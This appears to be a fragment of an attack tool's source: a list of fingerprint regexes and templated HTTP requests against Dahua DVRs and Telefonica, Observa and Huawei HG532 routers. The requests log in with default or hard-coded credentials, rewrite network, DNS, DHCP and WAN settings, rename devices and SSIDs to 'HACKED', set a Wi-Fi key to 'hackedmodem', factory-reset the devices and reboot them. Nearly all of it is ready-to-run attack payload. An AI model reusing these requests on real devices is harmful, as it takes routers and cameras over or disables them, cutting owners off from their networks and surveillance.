 'POST /RPC2 HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nContent-Length: %%BODYLENGTH%%\r\nCookie: DHLangCookie30=%2Fweb_lang%2FEnglish.txt; DhWebSnapPath=C%3A%5CPictureDownload; DhWebRecordPath=C%3A%5CRecordDownload; DhWebClientSessionID=%%CUSTOM2%%\r\n\r\n{"method":"configManager.setConfig","params":{"name":"VideoColor","table":[[{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"1 00:00:00-24:00:00"},{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"0 00:00:00-24:00:00"}],[{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"1 00:00:00-24:00:00"},{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"0 00:00:00-24:00:00"}],[{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"1 00:00:00-24:00:00"},{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"0 00:00:00-24:00:00"}],[{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"1 00:00:00-24:00:00"},{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"0 00:00:00-24:00:00"}],[{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"1 00:00:00-24:00:00"},{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"0 00:00:00-24:00:00"}],[{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"1 00:00:00-24:00:00"},{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"0 00:00:00-24:00:00"}],[{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"1 00:00:00-24:00:00"},{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"0 00:00:00-24:00:00"}],[{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"1 00:00:00-24:00:00"},{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"0 00:00:00-24:00:00"}],[{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"1 00:00:00-24:00:00"},{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"0 00:00:00-24:00:00"}],[{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"1 00:00:00-24:00:00"},{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"0 00:00:00-24:00:00"}],[{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"1 00:00:00-24:00:00"},{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"0 00:00:00-24:00:00"}],[{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"1 00:00:00-24:00:00"},{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"0 00:00:00-24:00:00"}],[{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"1 00:00:00-24:00:00"},{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"0 00:00:00-24:00:00"}],[{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"1 00:00:00-24:00:00"},{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"0 00:00:00-24:00:00"}],[{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"1 00:00:00-24:00:00"},{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"0 00:00:00-24:00:00"}],[{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"1 00:00:00-24:00:00"},{"Acutance":1,"Brightness":1,"Contrast":1,"Hue":1,"Saturation":1,"TimeSection":"0 00:00:00-24:00:00"}]],"options":""},"session":%%CUSTOM2%%,"id":111}:""' ,
6282
'POST /RPC2 HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nContent-Length: %%BODYLENGTH%%\r\nCookie: DHLangCookie30=%2Fweb_lang%2FEnglish.txt; DhWebSnapPath=C%3A%5CPictureDownload; DhWebRecordPath=C%3A%5CRecordDownload; DhWebClientSessionID=%%CUSTOM2%%\r\n\r\n{"method":"system.multicall","params":[{"method":"configManager.setConfig","params":{"name":"Network","table":{"DefaultInterface":"eth0","Domain":"dahua","Hostname":"DVR","eth0":{"DefaultGateway":"10.%%COMP8%%","DhcpEnable":false,"DnsServers":["1.2.3.4","1.2.3.5"],"IPAddress":"10.%%RAND8%%","MTU":1500,"PhysicalAddress":"90:02:A9:%%RHEX1%%:%%RHEX2%%:%%RHEX3%%","SubnetMask":"255.255.255.0"}},"options":""},"session":%%CUSTOM2%%,"id":558}, {"method":"configManager.setConfig","params":{"name":"MediaFileReaderGlobal","table":{"DefaultBitrateLevel":"Normal"},"options":""},"session":%%CUSTOM2%%,"id":559}, {"method":"configManager.setConfig","params":{"name":"IPv6","table":{"eth0":{"DefaultGateway":"","DnsServers":["::ffff:1.2.3.4","::ffff:1.2.3.5"],"IPAddress":"","LinkLocalAddress":"fe80::9202:a9ff:fed6:a411/64","Prefix":64}},"options":""},"session":95063849,"id":560}],"session":%%CUSTOM2%%,"id":561}' ,
6283
 'POST /RPC2 HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nContent-Length: %%BODYLENGTH%%\r\nCookie: DHLangCookie30=%2Fweb_lang%2FEnglish.txt; DhWebSnapPath=C%3A%5CPictureDownload; DhWebRecordPath=C%3A%5CRecordDownload; DhWebClientSessionID=%%CUSTOM2%%\r\n\r\n{"method":"configManager.setConfig","params":{"name":"WLan","table":{"eth0":{"SSID":""},"eth1":{"SSID":""},"eth2":{"LinkEnable":true,"SSID":""},"eth3":{"SSID":""},"eth4":{"SSID":""}},"options":""},"session":%%CUSTOM2%%,"id":131}:""' ,
6284
 'POST /RPC2 HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nContent-Length: %%BODYLENGTH%%\r\nCookie: DHLangCookie30=%2Fweb_lang%2FEnglish.txt; DhWebSnapPath=C%3A%5CPictureDownload; DhWebRecordPath=C%3A%5CRecordDownload; DhWebClientSessionID=%%CUSTOM2%%\r\n\r\n{"method":"configManager.setConfig","params":{"name":"Wireless","table":{"3G":{"APN":"","Activate":false,"AuthMode":"No","DailNumber":"","Enable":0,"KeepAlive":0,"Password":"","UserName":"","WorkMode":"Auto"}},"options":""},"session":%%CUSTOM2%%,"id":133}:""' ,
6285
 'POST /RPC2 HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nContent-Length: %%BODYLENGTH%%\r\nCookie: DHLangCookie30=%2Fweb_lang%2FEnglish.txt; DhWebSnapPath=C%3A%5CPictureDownload; DhWebRecordPath=C%3A%5CRecordDownload; DhWebClientSessionID=%%CUSTOM2%%\r\n\r\n{"method":"configManager.setConfig","params":{"name":"PPPoE","table":{"Enable":false,"Password":"HACKED","UserName":"HACKED"},"options":""},"session":%%CUSTOM2%%,"id":72}:""' ,
6286
 'POST /RPC2 HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nContent-Length: %%BODYLENGTH%%\r\nCookie: DHLangCookie30=%2Fweb_lang%2FEnglish.txt; DhWebSnapPath=C%3A%5CPictureDownload; DhWebRecordPath=C%3A%5CRecordDownload; DhWebClientSessionID=%%CUSTOM2%%\r\n\r\n{"method":"configManager.setConfig","params":{"name":"VideoIn","table":[{"Name":"HACKED 1"},{"Name":"HACKED 2"},{"Name":"UPGRADE 3"},{"Name":"FIRMWARE 4"},{"Name":"HACKED 5"},{"Name":"UPGRADE 6"},{"Name":"FIRMWARE 7"},{"Name":"HACKED 8"},{"Name":"UPGRADE 9"},{"Name":"FIRMWARE 10"},{"Name":"HACKED 11"},{"Name":"UPGRADE 12"},{"Name":"FIRMWARE 13"},{"Name":"HACKED 14"},{"Name":"UPGRADE 15"},{"Name":"FIRMWARE 16"}],"options":""},"session":%%CUSTOM2%%,"id":127}:""' ,
6287
 'POST /RPC2 HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nContent-Length: %%BODYLENGTH%%\r\nCookie: DHLangCookie30=%2Fweb_lang%2FEnglish.txt; DhWebSnapPath=C%3A%5CPictureDownload; DhWebRecordPath=C%3A%5CRecordDownload; DhWebClientSessionID=%%CUSTOM2%%\r\n\r\n{"method":"configManager.setConfig","params":{"name":"UPnP","table":{"Enable":false,"MapTable":[{"Enable":false,"InnerPort":80,"OuterPort":80,"Protocol":"TCP","ServiceName":"HTTP"},{"Enable":false,"InnerPort":37777,"OuterPort":37777,"Protocol":"TCP","ServiceName":"TCP"},{"Enable":false,"InnerPort":37778,"OuterPort":37778,"Protocol":"UDP","ServiceName":"UDP"},{"Enable":false,"InnerPort":554,"OuterPort":554,"Protocol":"UDP","ServiceName":"RTSP"},{"Enable":false,"InnerPort":554,"OuterPort":554,"Protocol":"TCP","ServiceName":"RTSP"},{"Enable":false,"InnerPort":161,"OuterPort":161,"Protocol":"UDP","ServiceName":"SNMP"},{"Enable":false,"InnerPort":443,"OuterPort":443,"Protocol":"TCP","ServiceName":"HTTPS"}]},"options":""},"session":%%CUSTOM2%%,"id":562}:""' ,
6288
 'POST /RPC2 HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nContent-Length: %%BODYLENGTH%%\r\nCookie: DHLangCookie30=%2Fweb_lang%2FEnglish.txt; DhWebSnapPath=C%3A%5CPictureDownload; DhWebRecordPath=C%3A%5CRecordDownload; DhWebClientSessionID=%%CUSTOM2%%\r\n\r\n{"method":"magicBox.reboot","params":{"delay" : 1100},"session":%%CUSTOM2%%,"id":211}:""' ,
6289
 'GET / HTTP/1.0\r\n\r\n' ,
6290
 ] ,
6291
[ 'homestation' , '200 Ok.*Server: minihttpd/.*window\.location\.href = /html/gui/;' ,
6292
 'GET /cgi-bin/webproc HTTP/1.0\r\n\r\n' ,
6293
 'POST /cgi-bin/webproc HTTP/1.1\r\nHost: %%TARGETIP%%\r\nReferer: http://%%TARGETIP%%/cgi-bin/webproc\r\nCookie: sessionid=%%CUSTOM1%%; language=en_us; sys_UserName=TelefonicaUser\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\ngetpage=html%2Findex.html&errorpage=html%2Fmain.html&var%3Amenu=setup&var%3Apage=wizard&obj-action=auth&%3Ausername=TelefonicaUser&%3Apassword=user&%3Aaction=login&%3Asessionid=%%CUSTOM1%%' ,
6294
 'POST /cgi-bin/webproc HTTP/1.1\r\nHost: %%TARGETIP%%\r\nReferer: http://%%TARGETIP%%/cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=lan\r\nCookie: sessionid=%%CUSTOM1%%; language=en_us; sys_UserName=TelefonicaUser\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n%3AInternetGatewayDevice.LANDevice.1.X_TWSZ-COM_ProxyArp=0&%3AInternetGatewayDevice.LANDevice.1.LANHostConfigManagement.DomainName=homestation&%3AInternetGatewayDevice.LANDevice.1.LANHostConfigManagement.IPInterface.1.Enable=0&%3AInternetGatewayDevice.LANDevice.1.LANHostConfigManagement.IPInterface.2.Enable=0&%3AInternetGatewayDevice.LANDevice.1.LANHostConfigManagement.IPInterface.1.IPInterfaceIPAddress=10.%%RAND8%%&%3AInternetGatewayDevice.LANDevice.1.LANHostConfigManagement.IPInterface.1.IPInterfaceSubnetMask=255.255.255.0&%3AInternetGatewayDevice.LANDevice.1.LANHostConfigManagement.DHCPServerEnable=1&%3AInternetGatewayDevice.LANDevice.1.LANHostConfigManagement.MinAddress=127.0.0.1&%3AInternetGatewayDevice.LANDevice.1.LANHostConfigManagement.MaxAddress=127.0.0.1&%3AInternetGatewayDevice.LANDevice.1.LANHostConfigManagement.DHCPLeaseTime=86400&%3AInternetGatewayDevice.LANDevice.1.LANHostConfigManagement.DHCPRelay=0&%3AInternetGatewayDevice.LANDevice.1.LANHostConfigManagement.SubnetMask=255.255.255.0&%3AInternetGatewayDevice.LANDevice.1.LANHostConfigManagement.IPRouters=10.%%COMP8%%&%3AInternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_DHCPEnabled=1&%3AInternetGatewayDevice.LANDevice.1.WLANConfiguration.2.X_TWSZ-COM_DHCPEnabled=1&%3AInternetGatewayDevice.LANDevice.1.WLANConfiguration.3.X_TWSZ-COM_DHCPEnabled=1&%3AInternetGatewayDevice.LANDevice.1.WLANConfiguration.4.X_TWSZ-COM_DHCPEnabled=1&%3AInternetGatewayDevice.LANDevice.1.LANHostConfigManagement.X_TWSZ-COM_UseIPRoutersAsDNSServer=0&%3AInternetGatewayDevice.LANDevice.1.LANHostConfigManagement.DNSServers=200.21.200.10%2C200.21.200.80&errorpage=html%2Findex.html&getpage=html%2Findex.html&var%3Amenu=setup&var%3Apage=lan&obj-action=set&var%3Aerrorpage=lan&%3AInternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.1.DhcpServerEnable=1&%3AInternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.2.DhcpServerEnable=1&%3AInternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.3.DhcpServerEnable=1&%3AInternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.4.DhcpServerEnable=1' ,
6295
 'POST /cgi-bin/webproc HTTP/1.1\r\nHost: %%TARGETIP%%\r\nReferer: http://%%TARGETIP%%/cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=wireless&var:subpage=wlbasic\r\nCookie: sessionid=%%CUSTOM1%%; language=en_us; sys_UserName=TelefonicaUser\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n%3AInternetGatewayDevice.X_TWSZ-COM_WLAN.WirelessMultiAPIsolationEnable=0&%3AInternetGatewayDevice.LANDevice.1.WLANConfiguration.1.Enable=1&%3AInternetGatewayDevice.LANDevice.1.WLANConfiguration.1.SSID=%28HACKED%29&%3AInternetGatewayDevice.LANDevice.1.WLANConfiguration.1.SSIDAdvertisementEnabled=1&%3AInternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_CurrentCountry=Colombia&%3AInternetGatewayDevice.LANDevice.1.WLANConfiguration.1.Channel=6&%3AInternetGatewayDevice.LANDevice.1.WLANConfiguration.1.Standard=bgn&%3AInternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_Bandwidth=40&%3AInternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_ControlSideband=Upper&var%3Amenu=setup&var%3Apage=wireless&var%3Asubpage=wlbasic&var%3Aerrorpage=wlbasic&getpage=html%2Findex.html&errorpage=html%2Findex.html&obj-action=set' ,
6296
 'POST /cgi-bin/webproc HTTP/1.1\r\nHost: %%TARGETIP%%\r\nReferer: http://%%TARGETIP%%/cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=route&var:subpage=defaultgw\r\nCookie: sessionid=%%CUSTOM1%%; language=en_us; sys_UserName=TelefonicaUser\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n%3AInternetGatewayDevice.X_TWSZ-COM_DEFAULT_GW.GWIP=1.2.3.4&%3AInternetGatewayDevice.X_TWSZ-COM_DEFAULT_GW.Active=GWIP&obj-action=set&getpage=html%2Findex.html&errorpage=html%2Findex.html&var%3Amenu=advanced&var%3Apage=route&var%3Asubpage=defaultgw&var%3Aerrorpage=defaultgw&var%3ACacheLastData=c2VsZWN0Q29ubmVjdGlvbk5hbWU9MHxBdXRvRGVmdEdXPWZhbHNlfEdXSVA9dHJ1ZXxzdGF0aWNSb3VnaW5nR2F0ZXdheT0xLjIuMy40fFVzZXJJbklmPWZhbHNl' ,
6297
'POST /cgi-bin/webproc HTTP/1.1\r\nHost: %%TARGETIP%%\r\nReferer: http://%%TARGETIP%%/cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=system\r\nCookie: sessionid=%%CUSTOM1%%; language=en_us; sys_UserName=TelefonicaUser\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nrestore=Restore+Default+Setting&obj-action=recover&var%3Anoredirect=1&var%3Amenu=maintenance&var%3Apage=system&var%3Aerrorpage=system&getpage=html%2Fpage%2Frestarting.html' ,
6298
 'GET / HTTP/1.0\r\n\r\n' ,
6299
 ] ,
6300
[ 'observa' , '200 Ok.*Server: minihttpd/.*window\.location\.href = /cgi-bin/webproc;' ,
6301
 'GET /cgi-bin/webproc HTTP/1.0\r\n\r\n' ,
6302
 'POST /cgi-bin/webproc HTTP/1.1\r\nHost: %%TARGETIP%%\r\nReferer: http://%%TARGETIP%%/cgi-bin/webproc\r\nCookie: sessionid=%%CUSTOM1%%; language=en_us; sys_UserName=support\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\ngetpage=html%2Fwizard%2Fguidesecond.html&var%3Apage=*&obj-action=auth&%3Ausername=%%LOGIN%%&%3Apassword=%%PASSWORD%%&%3Aaction=login&%3Asessionid=%%CUSTOM1%%' ,
6303
 'GET /cgi-bin/webproc?getpage=html/wizard/guidesecond.html&var:language=en_us&var:page=* HTTP/1.1\r\nHost: %%TARGETIP%%\r\nReferer: http://%%TARGETIP%%/cgi-bin/webproc\r\nCookie: sessionid=%%CUSTOM1%%\r\n\r\n' ,
6304
 'POST /cgi-bin/webproc HTTP/1.1\r\nHost: %%TARGETIP%%\r\nReferer: http://%%TARGETIP%%/cgi-bin/webproc\r\nCookie: sessionid=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nobj-action=set&getpage=html%2Fwizard%2Fguidefourth.html&errorpage=html%2Fwizard%2Fguidesecond.html&var%3Apage=html%2Fwizard%2Fguidesecond.html&%3AInternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANPPPConnection.1.Username=%%CUSTOM3%%' ,
6305
'POST /cgi-bin/webproc HTTP/1.1\r\nHost: %%TARGETIP%%\r\nReferer: http://%%TARGETIP%%/cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=system\r\nCookie: sessionid=%%CUSTOM1%%; language=en_us; sys_UserName=TelefonicaUser\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nrestore=Restore+Default+Setting&obj-action=recover&var%3Anoredirect=1&var%3Amenu=maintenance&var%3Apage=system&var%3Aerrorpage=system&getpage=html%2Fpage%2Frestarting.html' ,
6306
 'GET / HTTP/1.0\r\n\r\n' ,
6307
 ] ,
6308
 [ 'hg532' , '(CACHE-CONTROL|Cache-Control): no-cache.*LoginTimes.*Cookieflag' ,
6309
 'POST /index/login.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: FirstMenu=Admin_0; SecondMenu=Admin_0_0; ThirdMenu=Admin_0_0_0; Language=en\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUsername=admin&Password=OGM2OTc2ZTViNTQxMDQxNWJkZTkwOGJkNGRlZTE1ZGZiMTY3YTljODczZmM0YmI4YTgxZjZmMmFiNDQ4YTkxOA%3D%3D' ,
6310
'POST /index/login.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: FirstMenu=Admin_0; SecondMenu=Admin_0_0; ThirdMenu=Admin_0_0_0; Language=en\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUsername=instalador&Password=N2MwNGQxMzUzNzI1Y2ZkNzU4ZTFhYzNjM2JjZGRiMDkxNWNlNzA4OWU1NTlkODQ0Yjk2YTU4MjFmNTM1N2Y4Mg%3D%3D' ,
6311
'POST /index/login.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: FirstMenu=Admin_0; SecondMenu=Admin_0_0; ThirdMenu=Admin_0_0_0; Language=en\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUsername=instalador&Password=NjQzMGU0ZDBhMTMyYzI5Njg4NGUzMjNlOWJkMWM1MzJhODZmYmQ3OWJlYmUxN2U0Nzc1NDlmZjBkYjM0YzNiNA%3D%3D' ,
6312
'POST /index/login.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: FirstMenu=Admin_0; SecondMenu=Admin_0_0; ThirdMenu=Admin_0_0_0; Language=en\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUsername=admin&Password=YWRtaW4%3D' ,
6313
'POST /html/ntwkall/setcfg.cgi?x=InternetGatewayDevice.LANDevice.1.LANHostConfigManagement.IPInterface.1&y=InternetGatewayDevice.LANDevice.1.LANHostConfigManagement&RequestFile=/html/ntwkall/dhcp.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: FirstMenu=Admin_1; SecondMenu=Admin_1_2; ThirdMenu=Admin_1_2_0; Language=en; SessionID_R3=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nx.IPInterfaceIPAddress=10.%%RAND8%%&x.IPInterfaceSubnetMask=255.255.255.0&y.MinAddress=10.%%COMP8%%&y.MaxAddress=10.%%COMP8%%&y.DNSServers=1.2.3.4%2C1.2.3.5&y.Enable=0&y.DHCPServerEnable=0' ,
6314
 'POST /html/ntwkall/setcfg.cgi?x=InternetGatewayDevice.LANDevice.1.LANHostConfigManagement.IPInterface.1&y=InternetGatewayDevice.LANDevice.1.LANHostConfigManagement&RequestFile=/html/ntwkall/dhcp.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: FirstMenu=Admin_1; SecondMenu=Admin_1_2; ThirdMenu=Admin_1_2_0; Language=en; SessionID_R3=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nx.IPInterfaceIPAddress=10.%%RAND8%%&x.IPInterfaceSubnetMask=255.255.255.0&y.MinAddress=10.%%COMP8%%&y.MaxAddress=10.%%COMP8%%&y.DNSServers=1.2.3.4%2C1.2.3.5&y.DHCPServerEnable=0' ,
6315
 'POST /index/login.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: FirstMenu=Admin_0; SecondMenu=Admin_0_0; ThirdMenu=Admin_0_0_0; Language=en SessionID_R3=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUsername=%%LOGIN%%&Password=%%CUSTOM2%%' ,
6316
 'POST /html/ntwkall/setcfg.cgi?x=InternetGatewayDevice.LANDevice.1&y=InternetGatewayDevice.LANDevice.1.WLANConfiguration.1&k=InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.PreSharedKey.1&z=InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.WPS&RequestFile=/html/ntwkall/wlan.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: FirstMenu=Admin_1; SecondMenu=Admin_1_3; ThirdMenu=Admin_1_3_0; Language=en; SessionID_R3=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\ny.Standard=b%2Fg%2Fn&y.MaxBitRate=Auto&y.X_Wlan11NHtMcs=33&y.Enable=1&y.AutoChannelEnable=0&y.Channel=11&y.SSIDAdvertisementEnabled=1&y.X_WlanIsolateControl=0&y.WMMEnable=1&y.X_Wlan11NBWControl=20%2F40&y.X_Wlan11NGIControl=long&y.SSID=%%CUSTOM3%%HACKED&y.RegulatoryDomain=EC&y.X_AssociateDeviceNum=32&y.X_PowerValue=20&y.BeaconType=WPAand11i&z.Enable=1&z.X_WPSMode=ap-pbc&y.X_MixedEncryptionModes=AESEncryption&x.X_WLANEnable=1' ,
6317
'POST /html/ntwkall/setcfg.cgi?x=InternetGatewayDevice.LANDevice.1&y=InternetGatewayDevice.LANDevice.1.WLANConfiguration.1&k=InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.PreSharedKey.1&z=InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.WPS&RequestFile=/html/ntwkall/wlan.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: FirstMenu=Admin_1; SecondMenu=Admin_1_4; ThirdMenu=Admin_1_4_0; Language=en; SessionID_R3=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\ny.Standard=b%2Fg%2Fn&y.Enable=1&y.AutoChannelEnable=1&y.Channel=6&y.MaxBitRate=Auto&y.SSIDAdvertisementEnabled=1&y.X_WlanIsolateControl=0&y.WMMEnable=1&y.X_Wlan11NBWControl=20%2F40&y.X_Wlan11NGIControl=long&y.SSID=%%CUSTOM3%%HACKED&y.RegulatoryDomain=RO&y.X_AssociateDeviceNum=32&y.X_PowerValue=20&y.BeaconType=WPA&z.Enable=1&z.X_WPSMode=ap-pbc&k.PreSharedKey=hackedmodem&y.WPAEncryptionModes=AESEncryption&x.X_WLANEnable=1' ,
6318
'POST /html/ntwkall/setcfg.cgi?x=InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANDSLLinkConfig&y=InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1&RequestFile=/html/ntwkall/wan.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: FirstMenu=Admin_1; SecondMenu=Admin_1_1; ThirdMenu=Admin_1_1_0; Language=en; SessionID_R3=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\ny.Enable=0&y.X_ServiceList=INTERNET_TR069&y.X_LanInterface=&y.ConnectionType=IP_Routed&y.NATEnabled=0&y.AddressingType=Static&y.ExternalIPAddress=10.%%COMP8%%&y.SubnetMask=255.255.255.0&y.DefaultGateway=10.%%RAND8%%&y.DNSServers=1.2.3.4%2C1.2.3.5&y.DNSEnabled=0&y.DNSOverrideAllowed=0&y.X_DHCPRelay=0&y.X_IPv4Enable=1&y.X_IPv6Enable=0&y.X_IPv6AddressingType=SLAAC&y.X_IPv6DefaultGateway=&y.X_IPv6Address=&y.X_IPv6PrefixLength=0&y.X_IPv6DNSEnabled=1&y.X_IPv6DNSOverrideAllowed=1&y.X_IPv6DNSServers=&y.MaxMTUSize=1500&y.X_TCP_MSS=0&x.DestinationAddress=PVC%3A0%2F35&x.ATMQoS=UBR&x.Enable=1&x.LinkType=EoA&x.ATMEncapsulation=LLC&x.X_VLANIDMark=-1&x.X_802-1pMark=-1' ,
6319
 'POST /html/ntwkall/setcfg.cgi?x=InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANDSLLinkConfig&y=InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANPPPConnection.1&RequestFile=/html/ntwkall/wan.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: FirstMenu=Admin_1; SecondMenu=Admin_1_1; ThirdMenu=Admin_1_1_0; Language=en; SessionID_R3=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\ny.Enable=0&y.X_ServiceList=INTERNET&y.X_LanInterface=&y.ConnectionType=PPPoE_Bridged&y.X_DHCPRelay=0&y.ConnectionTrigger=AlwaysOn&y.IdleDisconnectTime=0&y.RouteProtocolRx=Off&y.X_IPv6Enable=0&y.MaxMTUSize=1492&x.DestinationAddress=PVC%3A0%2F35&x.ATMQoS=UBR&x.Enable=1&x.LinkType=EoA&x.ATMEncapsulation=LLC&x.X_VLANIDMark=-1&x.X_802-1pMark=-1' ,
6320
 'POST /html/ntwkall/setcfg.cgi?x=InternetGatewayDevice.WANDevice.2.WANConnectionDevice.1.WANIPConnection.1&RequestFile=/html/ntwkall/wan.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: FirstMenu=Admin_1; SecondMenu=Admin_1_2; ThirdMenu=Admin_1_2_0; Language=en; SessionID_R3=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nx.Enable=0&x.X_ServiceList=INTERNET&x.X_LanInterface=&x.ConnectionType=IP_Bridged&x.X_DHCPRelay=0&x.RouteProtocolRx=Off' ,
6321
